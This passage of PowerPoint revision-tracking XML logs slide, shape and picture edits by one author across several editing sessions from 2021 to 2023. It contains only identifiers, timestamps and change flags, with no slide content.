      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T22:32:33.640" v="6911" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="342117104" sldId="313"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T22:32:33.640" v="6911" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="342117104" sldId="313"/>
            <ac:spMk id="2" creationId="{89758C88-617B-0396-A63C-73BAF75E8646}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{D2EA55DE-8B87-4F8A-80F1-D0C196067A28}" dt="2023-01-20T22:22:56.762" v="6853" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="342117104" sldId="313"/>
            <ac:spMk id="3" creationId="{A8165CE4-4BF3-5C37-805D-C409906AC5D8}"/>
          </ac:spMkLst>
        </pc:spChg>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06T01:10:00.999" v="10634" actId="47"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T19:45:20.383" v="9957" actId="6549"/>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mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-26T22:11:14.469" v="900" actId="33524"/>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mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-26T15:41:14.219" v="142" actId="1076"/>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mod setBg addAnim delAnim modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-26T15:55:53.438" v="211" actId="26606"/>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mod ord modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T19:42:06.059" v="3496" actId="1076"/>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mod setBg setClrOvrMap modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-26T23:24:42.894" v="922" actId="2057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mod setBg">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-26T23:24:33.191" v="921" actId="6549"/>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mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-26T22:07:44.144" v="887" actId="313"/>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mod setBg modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T14:40:33.310" v="2566" actId="1076"/>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mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-06T00:11:56.294" v="10594" actId="2057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mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T21:40:51.971" v="10420" actId="108"/>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mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T22:13:51.978" v="10530" actId="1076"/>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mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T14:00:27.335" v="2028" actId="2057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mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T14:01:21.829" v="2041" actId="2057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mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T14:04:18.155" v="2106" actId="108"/>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mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T14:21:39.487" v="2435" actId="2057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mod setBg modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T14:31:55.580" v="2490" actId="2057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mod setBg modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-02T22:18:23.789" v="6246" actId="1076"/>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mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T15:06:57.285" v="2657" actId="2057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mod setBg modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T15:13:37.857" v="2729" actId="14100"/>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mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T15:20:40.196" v="2732"/>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mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T15:56:44.237" v="2943" actId="2057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mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T15:22:22.343" v="2738"/>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mod setBg modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-02T22:11:27.734" v="6170" actId="6549"/>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mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T20:10:50.835" v="3559" actId="108"/>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mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-02T21:19:08.375" v="6004" actId="6549"/>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mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-02-28T19:36:40.354" v="3477" actId="2057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mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-02T00:21:41.524" v="5407" actId="2057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mod ord modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-03T01:20:43.061" v="6949" actId="20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mod setBg">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-03T01:20:47.873" v="6950" actId="20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mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-03T01:06:48.381" v="6773" actId="27636"/>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ClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-01T02:11:54.831" v="4792" actId="313"/>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01T02:11:54.831" v="4792" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2783025053" sldId="287"/>
            <ac:spMk id="4" creationId="{9B649C4F-48C8-4CC6-BAE6-40898A5F80F4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-01T02:11:33.669" v="4753" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2783025053" sldId="287"/>
            <ac:spMk id="5" creationId="{F1291333-6596-4646-9C81-7FDF36633BA6}"/>
          </ac:spMkLst>
        </pc:sp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mod setBg modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-01T20:15:14.639" v="5131" actId="14100"/>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mod setBg modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-01T15:40:09.662" v="4901" actId="11529"/>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01T20:44:25.886" v="5190" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2207446241" sldId="294"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-01T20:36:58.770" v="5186" actId="20577"/>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mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-02T00:19:02.511" v="5333"/>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02T03:37:31.474" v="5973"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="877061006" sldId="300"/>
        </pc:sldMkLst>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mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-03T15:26:49.354" v="7114" actId="1076"/>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04T01:01:21.648" v="7429" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3237227748" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-04T01:01:21.648" v="7429"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04T01:45:11.674" v="8115"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1809058598" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-04T01:40:33.036" v="7967"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04T14:19:28.906" v="8326" actId="2057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04T14:19:28.906" v="8326" actId="2057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mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-04T16:45:39.384" v="9017" actId="6549"/>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mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-04T16:34:13.476" v="8898" actId="1076"/>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5T19:56:00.535" v="10087" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3506800452" sldId="322"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T19:56:00.535" v="10087" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3506800452" sldId="322"/>
            <ac:spMk id="4" creationId="{576AF58F-0844-4457-840F-0BC01EBB4A8F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T19:55:20.697" v="10026" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3506800452" sldId="322"/>
            <ac:picMk id="3" creationId="{67810B44-2F80-4642-AB22-57FF22D26696}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod setBg modClrScheme setClrOvrMap chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T20:35:18.409" v="10151" actId="2057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add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T21:11:48.534" v="10307" actId="1076"/>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delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T21:18:43.715" v="10341" actId="2057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Sp modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T21:21:44.231" v="10357" actId="6549"/>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modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T21:46:05.551" v="10469" actId="1076"/>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mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-05T22:17:35.143" v="10563" actId="2057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modSp new mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-06T00:07:30.807" v="10565" actId="114"/>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new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{AA256C9C-DD0A-4A24-AECC-DADA2E819996}" dt="2021-03-06T00:49:17.049" v="10596" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1125489474" sldId="330"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:20:41.040" v="375" actId="14734"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:20:23.707" v="374" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3439482671" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T13:35:25.491" v="51" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3439482671" sldId="303"/>
            <ac:spMk id="2" creationId="{2D1C1AD0-DD89-4FE1-9068-8567EB294783}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:20:23.707" v="374" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3439482671" sldId="303"/>
            <ac:spMk id="3" creationId="{65880B67-A57C-45DB-96C8-E304E8B3012D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T13:39:51.801" v="58" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3439482671" sldId="303"/>
            <ac:picMk id="5" creationId="{65C6746B-0EA5-4F4E-A5E5-4AEDBE6FD430}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:20:41.040" v="375" actId="14734"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1193768337" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T13:59:34.148" v="268" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1193768337" sldId="304"/>
            <ac:spMk id="2" creationId="{2983886C-6AF7-41CB-AFBE-E9B6E032D190}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T13:51:06.762" v="202" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1193768337" sldId="304"/>
            <ac:spMk id="3" creationId="{F152990E-509C-40A7-AF3A-8E2F34C38768}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:20:41.040" v="375" actId="14734"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1193768337" sldId="304"/>
            <ac:graphicFrameMk id="4" creationId="{C612B4C2-8036-41FB-9524-AE859FE5F89E}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod setBg modClrScheme setClrOvrMap chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:19:05.790" v="367" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3028288411" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:11:35.923" v="280" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3028288411" sldId="305"/>
            <ac:spMk id="2" creationId="{4BA4E1DD-2796-4246-BC66-F4267C01D17F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:12:47.444" v="286" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3028288411" sldId="305"/>
            <ac:spMk id="6" creationId="{92D8F2C8-D40B-46BA-A18D-C9BAC5D25077}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:11:37.805" v="281" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3028288411" sldId="305"/>
            <ac:picMk id="4" creationId="{3C34B9AC-008F-4D5C-A2D2-01DAF0EC0947}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:18:06.887" v="366" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="64038938" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:14:50.457" v="288" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="64038938" sldId="306"/>
            <ac:spMk id="2" creationId="{2D3D285F-FC94-44B0-AF43-A373E35D2ECE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:15:46.781" v="299" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="64038938" sldId="306"/>
            <ac:spMk id="6" creationId="{FB721F81-2502-4277-A000-8C68BF6E3D08}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:17:25.612" v="341" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="64038938" sldId="306"/>
            <ac:spMk id="7" creationId="{4FD5AF55-DB23-44D7-A9DF-3C4F65C930E2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:18:06.887" v="366" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="64038938" sldId="306"/>
            <ac:spMk id="8" creationId="{7F151ADF-621A-44BF-A044-98E536A30851}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:16:39.681" v="330" actId="1035"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="64038938" sldId="306"/>
            <ac:picMk id="4" creationId="{D13661E4-A9BA-473C-BCA7-F2FC3860604E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{38C0388A-6B20-4E10-AB29-C10F85EBBB2E}" dt="2021-03-19T14:15:42.425" v="298" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="64038938" sldId="306"/>
            <ac:picMk id="5" creationId="{F8627C4A-59BF-4486-9503-E483C7AE2F9F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{46DE1BDD-FFB5-43D5-AD20-6D652DA11BEB}"/>
    <pc:docChg chg="undo custSel addSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{46DE1BDD-FFB5-43D5-AD20-6D652DA11BEB}" dt="2021-03-21T13:31:35.466" v="125" actId="478"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{46DE1BDD-FFB5-43D5-AD20-6D652DA11BEB}" dt="2021-03-20T20:17:46.171" v="109" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1681695341" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{46DE1BDD-FFB5-43D5-AD20-6D652DA11BEB}" dt="2021-03-20T19:53:51.362" v="21" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1681695341" sldId="257"/>
            <ac:spMk id="2" creationId="{EC507F9E-469E-44F6-81E3-EB300C936190}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{46DE1BDD-FFB5-43D5-AD20-6D652DA11BEB}" dt="2021-03-20T20:17:13.176" v="105" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
